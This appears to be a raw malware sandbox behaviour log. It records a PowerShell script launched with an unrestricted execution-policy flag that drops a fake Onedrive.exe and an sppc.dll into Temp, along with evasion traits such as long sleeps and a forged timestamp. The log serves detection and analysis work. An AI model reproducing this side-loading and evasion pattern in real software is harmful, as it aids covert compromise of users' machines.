Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: String function: 00007FF8A031EFC0 appears 198 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: String function: 00007FF8A031DE30 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: String function: 00007FF8A031DDC0 appears 57 times
Source: classification engineClassification label: mal60.evad.winPS1@4/8@1/2
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F7B1C CoCreateInstance,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,3_2_00007FF6104F7B1C
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF6104F4B14 FindResourceExW,GetLastError,LoadResource,LockResource,3_2_00007FF6104F4B14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwlmme2b.4eo.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\g1.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Onedrive.exe "C:\Users\user\AppData\Local\Temp\Onedrive.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppcext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dui70.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: winscard.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: C:\Users\dell\Downloads\tamperedsyscallshellcodeinfile\x64\Release\tampered.pdb source: Onedrive.exe, 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmp, sppc.dll.0.dr
Source: Binary string: phoneactivate.pdb source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr
Source: Binary string: phoneactivate.pdbGCTL source: powershell.exe, 00000000.00000002.2268244875.0000022F7F419000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe, 00000003.00000000.2233891547.00007FF610501000.00000002.00000001.01000000.00000008.sdmp, Onedrive.exe.0.dr
Source: Onedrive.exe.0.drStatic PE information: 0xBBFECFD3 [Thu Dec 12 01:52:19 2069 UTC]
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_2_00007FF8A0301010 CreateFileA,GetFileSize,VirtualAlloc,ReadFile,CloseHandle,LoadLibraryW,GetProcAddress,VirtualFree,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,GetModuleHandleW,GetProcAddress,NtQuerySecurityObject,SleepEx,SleepEx,VirtualFree,CloseHandle,3_2_00007FF8A0301010
Source: Onedrive.exe.0.drStatic PE information: section name: .imrsiv
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F92D0B push ds; ret 3_3_0000021BD8F92D0E
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F98A53 push 2F672291h; retf 3_3_0000021BD8F98A92
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeCode function: 3_3_0000021BD8F851C3 push FF00009Eh; ret 3_3_0000021BD8F851C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\sppc.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Onedrive.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4661Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5211Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeWindow / User API: threadDelayed 2510Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeWindow / User API: threadDelayed 7478Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exeAPI coverage: 5.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492Thread sleep count: 2510 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492Thread sleep time: -2510000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492Thread sleep count: 7478 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Onedrive.exe TID: 5492Thread sleep time: -7478000s >= -30000sJump to behavior
